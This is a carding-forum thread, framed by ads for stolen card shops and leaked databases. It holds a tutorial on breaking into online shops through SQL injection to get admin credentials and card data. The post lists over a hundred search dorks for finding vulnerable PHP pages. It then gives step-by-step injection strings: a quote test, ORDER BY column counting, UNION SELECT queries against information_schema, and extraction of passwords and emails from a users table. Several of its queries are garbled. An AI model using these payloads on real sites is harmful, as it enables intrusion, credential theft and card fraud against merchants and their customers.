BPC Squad Bank Paypal And Cards | Carders Forum | Carding Forum

- Advertisement Area (For purchasing Ads or Banner contact ) Jabber [email protected] -(Telegram : @bpclover) -




Jerry's Store Excellent bases | AVS checker
Cerberux.CC The king shop with new checker feature attached + high quality spam cards direct from inbox.
Algae For Sale Global rare CC, Best Quality
CC+CVV Private Base Wholesale & Retail | Rare BINs
Bankman.biz Merchants, Banks US/EU, Crypto
BIGSTACKS DUMPS+PINS, EBT+PINS, CC+CVV




- Advertisement Area (For purchasing Ads or Banner contact )-Jabber-[email protected]

Best Regards
BPC Team







-BPCFORUM-  Registration Opened ####.


We are the Best one Carding Forum on Internet And you choose the right place to start Carding World so Enjoy your time with bpc , Also bpc is not responsible for any kind of post Because we are not a post owner So all stuff you will use at your own risk and If you face any kind of problem please feel free to contact with us.. Telegram : @bpclover
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5


[Old Tutorial] How to get CC by Hacked Shop Admin with SQL v5
#1
Hello All HFR
I just want share my hacking method
To get some of Shop Admin

1. List Of Dork:
Code:

Code:
inurl:IntelexXx .php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:IntelexXx .php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:IntelexXx .php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:Productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=

2. Find the target, after you find the target. example :

Quote: Wrote:shopadmin/shopping.php?id=

then try to add ' in the end of string, so now it look

Quote: Wrote:shopadmin/IntelexXx .php?id=1'

it should shown error messages on pages. this meaning the shop is vuln, if not get another shop.

3. After you find 1 vuln shop. with above string example. then you need to find list of table on it. you need to add string below, look example:

Quote: Wrote:shopadmin/shopping.php?id=-1 order by 1--


Trial

Quote: Wrote:shopadmin/shopping.php?id=-1 order by 1-- if there were nothing error message shown look likes on number 2 above, then you need to raise number of the possibility.
Look below :
shopadmin/shopping.php?id=-1 order by 1-- increase by 1
shopadmin/shopping.php?id=-1 order by 2--
................................... Until example
shopadmin/shopping.php?id=-1 Order by 17-- (Shown Error) 
So, you have get 1st information, that the database has 16 tables on it.


4. We have got info about sum tables on it. next we use string union select , to get 2nd infos
Steps: Look below


Quote: Wrote:shopadmin/shopping.php?id=1


changes to become

Quote: Wrote:shopadmin/shopping.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--

After that, look the pages, there were shown some numbers, and look the number shown there which has big size that another, example it was '9'
So,


Quote: Wrote:shopadmin/shopping.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--


change to 

Quote: Wrote:shopadmin/shopping.php?id=-1 1,2,3,4,5,6,7,8,9,@@version,10,11,12,13,14,15,16--

You will got 2nd infos, there Are SQL Version that used by the database.
2 Possibily about SQL version, it is Version 4 / 5. For SQL v4 you can inject it using Sql Blind Injection. For SQL v5, You can read this tut below.


Quote: Wrote:shopadmin/shopping.php?id=-1 union select 1,2,3,4,5,6,7,8,9,group_concat(table_name),10,11,12,13,14,15,16 information_schema.tables where table_schema=database()


Result will show some text infos. Find the infos related "admin" or "users" words. Example you find "users"
Then going to this sites
 It Is Text to Hex Converter 
Why, because we need to convert text to hex code. from word "users" ---> 7573657273

We got 3rd infos, it is hex code 7573657273 (users). Next back to shop and inject like below:

Quote: Wrote:shopadmin/shopping.php?id=-1 union select 1,2,3,4,5,6,7,8,9,group_concat(table_name),10,11,12,13,14,15,16 information_schema.tables where table_schema=database()


Then change the script with infos above
- table_name = column_name = group_concat(column_name)
- tables = columns = from information_schema.columns
- table_schema=database() =? table_name=0x(hex code from "users") = table_name=0x7573657273



Quote: Wrote:shopadmin/shopping.php?id=-1 union select 1,2,3,4,5,6,7,8,9,group_concat(table_name),10,11,12,13,14,15,16 from information_schema.columns where table_name=0x7573657273--


5. On this section, you will got important infos, like password,email,id etc
Get back to this url :


Quote: Wrote:shopadmin/shopping.php?id=-1 union select 1,2,3,4,5,6,7,8,9,group_concat(table_name),10,11,12,13,14,15,16 from information_schema.columns where table_name=0x7573657273--


6. we need to change (table name) look above, to infos we get on step "5", like below.


Quote: Wrote:shopadmin/shopping.php?id=-1 union select 1,2,3,4,5,6,7,8,9,group_concat(password,0x3a,email,0x3a,id),10,11,12,13,14,15,16 from information_schema.columns where table_name=0x7573657273--


next to need to re-convert hex code to text form 0x7573657273 --> users
Then it's final step. it looks like.


Quote: Wrote:shopadmin/shopping.php?id=-1 union select 1,2,3,4,5,6,7,8,9,group_concat(password,0x3a,email,0x3a,id),10,11,12,13,14,15,16 from users--


You will get user + password some admin of those shop.
All you need now, looking around and find Shopadmin Login Pages On it [Image: confused.png]hisha_goza:

This my Example Hacked Shop
Albania - Kosovo
Find Rate
Reply


Digg   Delicious   Reddit   Facebook   Twitter   StumbleUpon  


Possibly Related Threads…
Thread Author Replies Views Last Post
  [HACKED] Panasonic Network Camera Live Viewer cjpeg 0 1,795 11-05-2020, 11:31 PM
Last Post: cjpeg
  MoneyBookers Database Hacked in 2009 & Leaked October 2015 - Free Download cjpeg 0 1,916 12-13-2019, 10:54 AM
Last Post: cjpeg
  SocialEngineered Database hacked 13th of June 2019 - Free Download cjpeg 0 1,827 11-21-2019, 01:54 PM
Last Post: cjpeg
  [Emails4Hits] Casa IOL Classificados Full Mail Dump hacked 1 of November of 2019 - Fr cjpeg 0 1,745 11-01-2019, 03:59 PM
Last Post: cjpeg
  [Emails4Hits] Norfolk Tourist Information Full Email Dump hacked 27 of October of 201 cjpeg 0 1,724 10-29-2019, 10:26 AM
Last Post: cjpeg
  [Emails4Hits] Classificados Chapeco Partial Email Dump hacked 27 of October of 2019 - cjpeg 0 1,690 10-28-2019, 05:24 PM
Last Post: cjpeg
  UnHackMe 10.60.0.810 - If you have been hacked - use UnHackMe! cjpeg 0 2,104 06-01-2019, 07:12 AM
Last Post: cjpeg
  TUTORIAL - Criando testador de CC em VB.NET VIDEOS + SOURCE CODE crowl 0 2,218 04-26-2019, 02:30 PM
Last Post: crowl
  Acceder.gratis Hacked 2019 Generator cjpeg 0 1,914 04-13-2019, 10:06 AM
Last Post: cjpeg
  Carding tutorial Anon 142 88,543 09-08-2018, 08:09 PM
Last Post: mamapapa



Users browsing this thread:
1 Guest(s)

 
Carding forum